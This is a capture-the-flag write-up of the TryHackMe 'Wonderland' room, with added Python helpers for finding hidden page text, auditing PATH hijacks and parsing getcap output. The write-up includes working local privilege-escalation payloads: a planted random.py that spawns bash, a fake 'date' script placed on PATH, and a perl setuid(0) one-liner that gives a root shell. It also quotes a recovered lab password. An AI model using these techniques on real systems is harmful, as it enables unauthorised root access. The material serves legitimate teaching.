TryHackMe has a series about Alice in Wonderland, which comprises 2 machines to root. This is the writeup for the first machine.
Scanning and Enumeration
I started with an Nmap scan, which found SSH on port 22 and a website on port 80:
root@ip-10-10-215-90:~# nmap -A -T4 10.10.35.122
Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-11 15:48 BST
Nmap scan report for ip-10-10-35-122.eu-west-1.compute.internal (10.10.35.122)
Host is up (0.0095s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
|   256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_  256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (EdDSA)
80/tcp open  http    Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
MAC Address: 02:EE:DE:10:1E:97 (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=4/11%OT=22%CT=1%CU=37751%PV=Y%DS=1%DC=D%G=Y%M=02EEDE%T
OS:M=6435736E%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M23
OS:01ST11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)
OS:WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R=Y%DF=Y%T=40%W=
OS:F507%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N
OS:)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0
OS:%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7
OS:(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=
OS:0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   9.50 ms ip-10-10-35-122.eu-west-1.compute.internal (10.10.35.122)
It looked like a classic web application plus privilege escalation box, so I launched gobuster against the website to find any interesting pages while I manually looked around the site itself:
root@ip-10-10-215-90:~# gobuster dir -t 32 --url http://10.10.35.122 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.35.122
[+] Threads:        32
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/04/11 15:54:54 Starting gobuster
===============================================================
/img (Status: 301)
/r (Status: 301)
/poem (Status: 301)
/http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fyoutube (Status: 301)
/http%3A%2F%2Fblogs (Status: 301)
/http%3A%2F%2Fblog (Status: 301)
/**http%3A%2F%2Fwww (Status: 301)
/http%3A%2F%2Fcommunity (Status: 301)
/http%3A%2F%2Fradar (Status: 301)
/http%3A%2F%2Fjeremiahgrossman (Status: 301)
/http%3A%2F%2Fweblog (Status: 301)
/http%3A%2F%2Fswik (Status: 301)
===============================================================
2023/04/11 15:55:10 Finished
===============================================================
Since this was an Alice in Wonderland themed room, of course the website had a “follow the rabbit” quote in it. I had a suspicion, and I ran a quick gobuster scan to confirm it:
root@ip-10-10-215-90:~# gobuster dir -t 32 --url http://10.10.35.122/r -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.35.122/r
[+] Threads:        32
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/04/11 16:00:14 Starting gobuster
===============================================================
/a (Status: 301)
[scan stopped as soon as I got what I needed]
It looked like the website spelled out "rabbit" as a directory path, http://10.10.35.122/r/a/b/b/i/t/, so I went straight to that URL and found another Alice in Wonderland quote.
What was useful, though, was a piece of hidden text in that page's source (not shown in the rendered page) that looked like credentials.
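Viewing the source by hand works for one page; as an added example (my code, not part of the original writeup), the following does it systematically. It parses an HTML document and returns every piece of text a browser would not render: elements hidden with inline CSS (display:none, visibility:hidden) or the HTML5 hidden attribute, plus HTML comments. SAMPLE_HTML is constructed to mimic the pattern on the rabbit-hole page; the credential-looking string in it is a placeholder, not the room's real one.

```python
"""Pull out text that is in a page's source but not in its rendered form.

Added example, not part of the original writeup. SAMPLE_HTML is constructed
to mimic the pattern found on the rabbit-hole page; the credential-looking
string in it is a placeholder, not the room's real one.
"""
import re
from html.parser import HTMLParser

SAMPLE_HTML = """<html><head><title>Follow the white rabbit.</title></head>
<body>
<p>"Curiouser and curiouser!" cried Alice.</p>
<!-- TODO: remove before going live -->
<p style="display: none;">Open the door and enter wonderland</p>
<p style="visibility:hidden">alice:example-placeholder-password</p>
<span hidden>text hidden with the HTML5 hidden attribute</span>
<img src="/img/white_rabbit_1.jpg">
</body></html>"""

# Inline-CSS ways of hiding an element that still leave its text in the source.
HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
# Void elements never get a closing tag, so they must not affect nesting depth.
VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}


class HiddenTextExtractor(HTMLParser):
    """Collects text inside hidden elements and inside HTML comments."""

    def __init__(self):
        super().__init__()
        self.findings = []       # list of (kind, text)
        self._depth = 0          # > 0 while inside a hidden element
        self._buffer = []

    def handle_starttag(self, tag, attrs):
        if tag in VOID_TAGS:
            return
        attrs = dict(attrs)
        hidden = "hidden" in attrs or HIDDEN_STYLE.search(attrs.get("style") or "")
        if self._depth:
            self._depth += 1      # nested inside an already-hidden element
        elif hidden:
            self._depth = 1
            self._buffer = []

    def handle_endtag(self, tag):
        if tag in VOID_TAGS or not self._depth:
            return
        self._depth -= 1
        if self._depth == 0:
            text = " ".join("".join(self._buffer).split())
            if text:
                self.findings.append(("hidden-element", text))

    def handle_data(self, data):
        if self._depth:
            self._buffer.append(data)

    def handle_comment(self, data):
        text = data.strip()
        if text:
            self.findings.append(("comment", text))


def find_hidden_text(html):
    """Return [(kind, text), ...] for everything a browser would not display."""
    parser = HiddenTextExtractor()
    parser.feed(html)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    for kind, text in find_hidden_text(SAMPLE_HTML):
        print(f"{kind:15} {text}")
```

Feed it the body of a curl response and it replaces the grep-for-"hidden" step; text hidden by an external stylesheet or by matching foreground and background colours is out of scope and still needs a look at the source.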
Initial access
I used those credentials to log in via SSH as the user "alice", and I was in.
alice@wonderland:~$ ls -la
total 40
drwxr-xr-x 5 alice alice 4096 May 25  2020 .
drwxr-xr-x 6 root  root  4096 May 25  2020 ..
lrwxrwxrwx 1 root  root     9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 alice alice  220 May 25  2020 .bash_logout
-rw-r--r-- 1 alice alice 3771 May 25  2020 .bashrc
drwx------ 2 alice alice 4096 May 25  2020 .cache
drwx------ 3 alice alice 4096 May 25  2020 .gnupg
drwxrwxr-x 3 alice alice 4096 May 25  2020 .local
-rw-r--r-- 1 alice alice  807 May 25  2020 .profile
-rw------- 1 root  root    66 May 25  2020 root.txt
-rw-r--r-- 1 root  root  3577 May 25  2020 walrus_and_the_carpenter.py
alice@wonderland:~$
sudo -l gave me a hint about the next step on this machine:
alice@wonderland:~$ sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
alice@wonderland:~$
I could run that specific Python script as the user "rabbit", so there was likely a way to abuse it to become rabbit and continue exploring the machine.
"walrus_and_the_carpenter.py" was a Python script that imported the "random" module and used it to print 10 random lines from a poem embedded in the script itself (a poem by Lewis Carroll, the author of Alice in Wonderland).
It took me a while to figure it out, as I'm a bit rusty with Python, but eventually I worked out that because the script imports "random", I could create a random.py file in the same folder and the script would load that instead of the standard "random" module. The reason this works: when Python runs a script, it puts the script's own directory (here /home/alice, which alice owns) at the front of sys.path, ahead of the standard library, so a module of the same name placed there wins. No environment variable is involved, which is why sudo's env_reset (which would strip PYTHONPATH) does not protect against it. The root cause is a sudo rule pointing at a script in a directory the calling user can write to.
Lateral movement
I created the random.py file with the following code:
import os
os.system("/bin/bash")
And it gave me a shell as the user “rabbit”:
alice@wonderland:~$ sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ id
uid=1002(rabbit) gid=1002(rabbit) groups=1002(rabbit)
Inside rabbit's home folder there was a file called teaParty with the SUID bit set.
Running it on its own didn't reveal much:
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 11 Apr 2023 17:47:27 +0000
Ask very nicely, and I will give you some tea while you wait for him
Segmentation fault (core dumped)
rabbit@wonderland:/home/rabbit$
But looking inside the file made the next step clear.
Similar to the Python script, it called another program that could be hijacked: "date" was invoked without an absolute path, so it is looked up through the PATH variable, and the SUID process inherits that PATH from whoever runs it.
So I added /tmp to the front of the PATH variable:
rabbit@wonderland:/home/rabbit$ export PATH=/tmp:$PATH
rabbit@wonderland:/home/rabbit$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
rabbit@wonderland:/home/rabbit$
and created a fake "date" script in /tmp that would open a bash shell with the privileges of the teaParty binary. One caveat worth knowing: if a SUID binary only changes the effective UID and leaves the real UID alone, bash drops the effective UID back on start-up and you need bash -p to keep it; here, as the prompt below shows, that wasn't necessary. This was the code inside the fake "date":
#!/bin/bash
/bin/bash
And it worked, I got the shell as the “hatter” user:
rabbit@wonderland:/home/rabbit$ chmod +x /tmp/date
rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by hatter@wonderland:/home/rabbit$
hatter@wonderland:/home/rabbit$
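The lookup that makes this work, and a quick way to audit a host for it, as an added example (my code, not from the original writeup): resolve_in_path() performs the search a shell or libc's system() does for a command name without a slash; hijackable_dirs() lists the PATH entries that are searched before the genuine binary and that the current user can write to; demo_hijack() stages a fake "date" in a temporary directory and runs the same unqualified "date" that teaParty runs. The fake only echoes a marker instead of starting a shell, and the directory and file names are the example's own.

```python
"""Show how an unqualified command name gets hijacked through PATH, and audit for it.

Added example, not part of the original writeup. The fake 'date' staged here
only echoes a marker; on the box it would have been /bin/bash.
"""
import os
import stat
import subprocess
import tempfile


def resolve_in_path(command, path_env):
    """First executable called `command` along path_env, or None (empty entry = cwd)."""
    for directory in path_env.split(os.pathsep):
        candidate = os.path.join(directory or ".", command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate
    return None


def hijackable_dirs(command, path_env):
    """PATH entries searched before the genuine `command` that this user can write to."""
    writable = []
    for directory in path_env.split(os.pathsep):
        directory = directory or "."
        candidate = os.path.join(directory, command)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            break                       # from here on the real binary wins
        if os.path.isdir(directory) and os.access(directory, os.W_OK):
            writable.append(directory)
    return writable


def demo_hijack():
    """Stage a /tmp-style hijack of 'date' and report what actually ran."""
    with tempfile.TemporaryDirectory() as evil_dir:
        # Attacker-controlled directory first, then whatever PATH we inherited.
        path_env = evil_dir + os.pathsep + os.environ.get("PATH", "/usr/bin:/bin")
        # Audit before planting anything: the empty writable dir is the finding.
        writable_before_real = hijackable_dirs("date", path_env)

        fake = os.path.join(evil_dir, "date")
        with open(fake, "w") as f:
            f.write("#!/bin/sh\necho HIJACKED-DATE\n")   # on the box: /bin/bash
        os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR)

        # The vulnerable pattern: a command name without a slash, resolved
        # through whatever PATH the (SUID) process inherited from its caller.
        out = subprocess.run(["/bin/sh", "-c", "date"], env={"PATH": path_env},
                             capture_output=True, text=True).stdout.strip()
        return {
            "evil_dir": evil_dir,
            "resolved_to_fake": resolve_in_path("date", path_env) == fake,
            "writable_before_real": writable_before_real,
            "output": out,
        }


if __name__ == "__main__":
    here = os.environ.get("PATH", "")
    print("date resolves to:", resolve_in_path("date", here))
    print("writable PATH dirs searched before it:", hijackable_dirs("date", here))
    print(demo_hijack())
```

The fix on the binary side is to call /bin/date by absolute path (or reset PATH to a fixed value before system()); the audit function is handy after a low-privilege shell lands, run against the PATH that any SUID program you find would inherit.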
There was a password.txt file inside the hatter’s home folder:
hatter@wonderland:/home$ id
uid=1003(hatter) gid=1002(rabbit) groups=1002(rabbit)
hatter@wonderland:/home$ cd hatter/
hatter@wonderland:/home/hatter$ ls -la
total 28
drwxr-x--- 3 hatter hatter 4096 May 25  2020 .
drwxr-xr-x 6 root   root   4096 May 25  2020 ..
lrwxrwxrwx 1 root   root      9 May 25  2020 .bash_history -> /dev/null
-rw-r--r-- 1 hatter hatter  220 May 25  2020 .bash_logout
-rw-r--r-- 1 hatter hatter 3771 May 25  2020 .bashrc
drwxrwxr-x 3 hatter hatter 4096 May 25  2020 .local
-rw-r--r-- 1 hatter hatter  807 May 25  2020 .profile
-rw------- 1 hatter hatter   29 May 25  2020 password.txt
hatter@wonderland:/home/hatter$ cat password.txt
WhyIsARavenLikeAWritingDesk?
And, as the "id" output above shows, I was still in the group "rabbit" rather than hatter: teaParty only changed the user ID, not the group ID.
So I logged in via SSH with hatter's credentials and, now with a proper session as that user, started looking for ways to escalate my privileges to root.
Privilege escalation
Enumerating file capabilities with getcap showed that the perl binary carried cap_setuid (the "+ep" means the capability is both permitted and effective, so any user who can execute perl gets it):
hatter@wonderland:/home$ getcap -r / 2>/dev/null
/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
At that point it was a simple matter of running one command to get a root shell: with cap_setuid effective, perl may call setuid(0) without being root, and the shell it then execs inherits uid 0:
hatter@wonderland:~$ /usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
# id
uid=0(root) gid=1003(hatter) groups=1003(hatter)
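Reading getcap output by eye is fine for three lines, but on a real host there are more, and the format differs between libcap versions. As an added example (my code, not from the original writeup), the following parses both the older "path = caps+flags" form quoted above and the newer "path caps=flags" form, then flags binaries whose effective capabilities give a direct privilege-escalation path. SAMPLE_GETCAP is the output from above; the list of dangerous capabilities is a short selection of my own, not an exhaustive one.

```python
"""Parse `getcap -r /` output and flag capabilities usable for privilege escalation.

Added example, not part of the original writeup. SAMPLE_GETCAP is the
getcap output quoted above; DANGEROUS is a short, non-exhaustive selection.
"""
import re

SAMPLE_GETCAP = """/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep
"""

# Capabilities that, when effective on an executable any user can run, give
# a direct path to root or to reading/writing arbitrary files.
DANGEROUS = {
    "cap_setuid": "call setuid(0), then exec a shell (the perl trick above)",
    "cap_setgid": "call setgid(0) for group-level access",
    "cap_dac_override": "bypass file permission checks",
    "cap_dac_read_search": "read any file, e.g. /etc/shadow",
    "cap_sys_admin": "mount, namespaces and much more",
    "cap_sys_ptrace": "attach to processes of other users",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "take ownership of any file",
    "cap_fowner": "change the mode of any file",
}

# libcap prints either "path = caps" (older) or "path caps" (libcap >= 2.41);
# each clause is "cap[,cap...]" followed by "+flags" or "=flags", with flags
# drawn from e (effective), p (permitted) and i (inheritable).
LINE_RE = re.compile(r"^(?P<path>\S+)\s*=?\s*(?P<caps>.+)$")
CLAUSE_RE = re.compile(r"^(?P<names>[a-z0-9_,]+)[+=](?P<flags>[eip]+)$")


def parse_getcap(text):
    """Return {path: {capability: set(flags)}} for each line of getcap output."""
    result = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        caps = {}
        for clause in m.group("caps").split():
            c = CLAUSE_RE.match(clause)
            if not c:
                continue
            for name in c.group("names").split(","):
                caps.setdefault(name, set()).update(c.group("flags"))
        result[m.group("path")] = caps
    return result


def dangerous_binaries(text):
    """(path, capability, why) for every *effective* dangerous capability found."""
    hits = []
    for path, caps in parse_getcap(text).items():
        for name, flags in caps.items():
            # Permitted-only ("+p") needs the program to raise the capability
            # itself; a capability-unaware binary like perl only helps if it
            # is effective ("e") at exec time.
            if name in DANGEROUS and "e" in flags:
                hits.append((path, name, DANGEROUS[name]))
    return hits


if __name__ == "__main__":
    for path, cap, why in dangerous_binaries(SAMPLE_GETCAP):
        print(f"{path}: {cap} -> {why}")
```

Pipe a live `getcap -r / 2>/dev/null` into parse_getcap() and the two perl entries come out as the only hits; mtr-packet's cap_net_raw is expected on a network tool and is left alone.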
With that, I got the two flags (user and root) and finished this room. I think the user flag could have been read directly with cat /root/user.txt, reasoning that if root.txt sat in the user's home, then user.txt was probably in root's home (in line with the Mad Hatter's character).
I honestly didn't think of this, and since I was going to get root privileges eventually, I postponed searching for the user flag until I was root.